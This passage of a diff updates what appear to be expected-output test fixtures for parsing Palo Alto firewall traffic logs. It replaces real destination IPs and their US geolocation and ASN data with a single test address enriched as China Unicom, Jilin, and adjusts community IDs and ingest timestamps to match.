04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381733300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -2530,27 +2524,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -2569,7 +2562,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2603,7 +2596,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=", + "community_id": "1:lB9VWdNEHqna/swiak+4X1dqv1k=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -2641,14 +2634,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283956883Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381738800Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2671,24 +2664,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -2707,7 +2702,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2741,7 +2736,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vFErz1cKNExckY21peQ3YAc8Tmk=", + "community_id": "1:PMRrLCOB2StOtC/z2Ryc3xs4yys=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -2779,14 +2774,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283961584Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381744Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -2809,24 +2804,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -2845,7 +2842,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2879,7 +2876,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:i4rdWjY94ZjxNIBve+QH3YwdL04=", + "community_id": "1:D/AITIdbtDhbzJ7TPkD8tJEDQL8=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -2917,14 +2914,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283966100Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381749300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2947,27 +2944,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -2986,7 +2982,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3020,7 +3016,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=", + "community_id": "1:CpnxxiYk2GolQXL1AiyOIq2jeIE=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -3058,14 +3054,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283970635Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381754600Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -3088,24 +3084,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 98, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -3124,7 +3122,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -3158,7 +3156,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GjCL7PEzM4X3r7frQ42mW+tNEIQ=", + "community_id": "1:uZGf14yGXLuVqgxNn/x0hlWgh4g=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -3196,14 +3194,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283979716Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381760Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3226,27 +3224,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { 
@@ -3265,7 +3262,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -3299,7 +3296,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2+g5+FYJDJku+1Cl3ZbhVCYdAog=", + "community_id": "1:PD0hioBJ+IzajuBqLSHPUBrCofM=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -3337,14 +3334,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283985805Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381765600Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3367,27 +3364,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { 
@@ -3406,7 +3402,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -3440,7 +3436,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+ENVPObTW4uBLTLg/Gs7oB3/t0E=", + "community_id": "1:mENVk+bt4rLWFKRUfRfPQ6qnUkc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -3478,14 +3474,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283990427Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381768800Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3508,27 +3504,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -3547,7 +3542,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3581,7 +3576,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:TPp8b1ubMhxmeJWRt0DCagjd7jA=", + "community_id": "1:yprTBHc/3GeEhSAWP96ta1sM430=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -3619,14 +3614,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283995192Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381773Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -3649,24 +3644,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -3685,7 +3682,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3719,7 +3716,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9xSXx0HsnsbhZkZ6kFjNeIn1Aw8=", + "community_id": "1:H+bw8FHQcsUlyIhoVDQ+NX6rtHg=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -3757,14 +3754,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283999698Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381778Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3787,24 +3784,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
